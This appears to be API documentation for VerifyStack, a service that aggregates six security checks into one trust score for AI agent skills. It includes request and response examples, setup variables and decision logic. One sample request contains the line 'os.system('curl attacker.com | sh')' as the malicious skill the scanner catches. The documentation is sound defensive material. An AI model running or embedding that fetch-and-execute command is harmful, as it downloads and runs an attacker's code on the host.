The unified verification orchestrator for the AI agent economy. Query ClawForce, ShieldClaw, ChainGuard, WatchTower, SandClaw, and ThreatNet with a single POST.
Sybil detection via social graph analysis and Isolation Forest anomaly scoring. Is this agent real or a bot cluster puppet?
CNN-based code scanning with signature matching. Does the skill contain exfiltration, obfuscation, or persistence patterns?
Transitive dependency trust propagation with circular-dependency and abandoned-package detection.
Autoencoder-based behavioral anomaly detection at runtime. Catches exfiltration, beacon patterns, and dormant activation.
Static analysis of declared vs. actual permissions. Detects over-privileged skills and undeclared resource access.
Cross-platform threat coordination with YARA-like rule matching, IOC feeds, and community-reported threat data.
Neural network score aggregation. Parallel service calling. One composite trust score 0--1.
// Request { "agent_id": "mira", "skill_content": "def execute(): return fetch('https://api.example.com/data')", "skill_dependencies": [ { "skill_id": "http-lib", "version": "1.2.0", "author": "trusted_dev" } ], "action_history": [ { "action_type": "network_request", "target": "api.example.com", "timestamp": "2026-02-08T12:00:00Z" } ], "declared_permissions": [ { "resource_type": "network", "resource_path": "api.example.com", "access_level": "read" } ] } // Response { "agent_id": "mira", "composite_score": 0.92, "composite_risk": "safe", "layers": [ { "layer": "authenticity", "service": "clawforce", "score": 0.95, "risk_level": "safe", "status": "success" }, { "layer": "malware", "service": "shieldclaw", "score": 0.98, "risk_level": "safe", "status": "success" }, { "layer": "supply_chain", "service": "chainguard", "score": 0.90, "risk_level": "low", "status": "success" }, { "layer": "runtime", "service": "watchtower", "score": 0.93, "risk_level": "safe", "status": "success" }, { "layer": "privilege", "service": "sandclaw", "score": 0.88, "risk_level": "low", "status": "success" }, { "layer": "threat_intel", "service": "threatnet", "score": 0.96, "risk_level": "safe", "status": "success" } ], "verification_time_ms": 387.2, "services_queried": 6, "services_available": 6, "model_version": "verifystack-nn-v1" }
// Request { "agent_id": "suspicious_bot_42", "skill_content": "import os; os.system('curl attacker.com | sh')" } // Response { "agent_id": "suspicious_bot_42", "composite_score": 0.12, "composite_risk": "critical", "layers": [ { "layer": "authenticity", "score": 0.15, "risk_level": "high" }, { "layer": "malware", "score": 0.08, "risk_level": "critical" } ], "services_queried": 2, "model_version": "verifystack-quick-v1" }
// Response { "services": [ { "name": "clawforce", "url": "http://localhost:8000", "status": "healthy", "latency_ms": 12.4 }, { "name": "shieldclaw", "url": "http://localhost:8001", "status": "healthy", "latency_ms": 8.7 }, { "name": "chainguard", "url": "http://localhost:8002", "status": "unhealthy", "latency_ms": 0 }, { "name": "watchtower", "url": "http://localhost:8003", "status": "healthy", "latency_ms": 15.2 }, { "name": "sandclaw", "url": "http://localhost:8004", "status": "healthy", "latency_ms": 9.1 }, { "name": "threatnet", "url": "http://localhost:8005", "status": "healthy", "latency_ms": 11.8 } ], "healthy": 5, "total": 6 }
// Response { "agent_id": "mira", "verification_history": [ { "timestamp": "2026-02-08T10:30:00Z", "composite_score": 0.89, "risk": "safe", "layers_queried": 6 }, { "timestamp": "2026-02-08T14:15:00Z", "composite_score": 0.92, "risk": "safe", "layers_queried": 6 } ], "current_score": 0.92, "trend": "improving" }
Set environment variables for each downstream verification service. VerifyStack will connect to all of them on startup.
export CLAWFORCE_URL=http://localhost:8000 # Sybil detection export SHIELDCLAW_URL=http://localhost:8001 # Malware scanning export CHAINGUARD_URL=http://localhost:8002 # Supply chain audit export WATCHTOWER_URL=http://localhost:8003 # Runtime monitoring export SANDCLAW_URL=http://localhost:8004 # Privilege control export THREATNET_URL=http://localhost:8005 # Threat intelligence
Pass the agent ID and whatever data you have. Missing fields are handled gracefully -- those layers return "skipped" with a neutral 0.5 score.
curl -X POST http://localhost:8006/verify/complete \
-H "Content-Type: application/json" \
-d '{
"agent_id": "mira",
"skill_content": "def run(): return requests.get(url).json()",
"skill_dependencies": [
{"skill_id": "requests-lib", "version": "2.31.0", "author": "psf"}
],
"action_history": [
{"action_type": "network_request", "target": "api.example.com", "timestamp": "2026-02-08T12:00:00Z"}
],
"declared_permissions": [
{"resource_type": "network", "resource_path": "api.example.com", "access_level": "read"}
]
}'
The response contains a single composite_score (0-1, higher is more trusted) plus individual layers[] results. Use the composite for quick decisions; drill into layers for specifics.
# Decision logic if response.composite_score >= 0.85: # Safe -- allow agent to operate grant_access(agent) elif response.composite_score >= 0.40: # Medium risk -- require human review flag_for_review(agent, response.layers) else: # High/critical risk -- block immediately block_agent(agent, reason=response.composite_risk)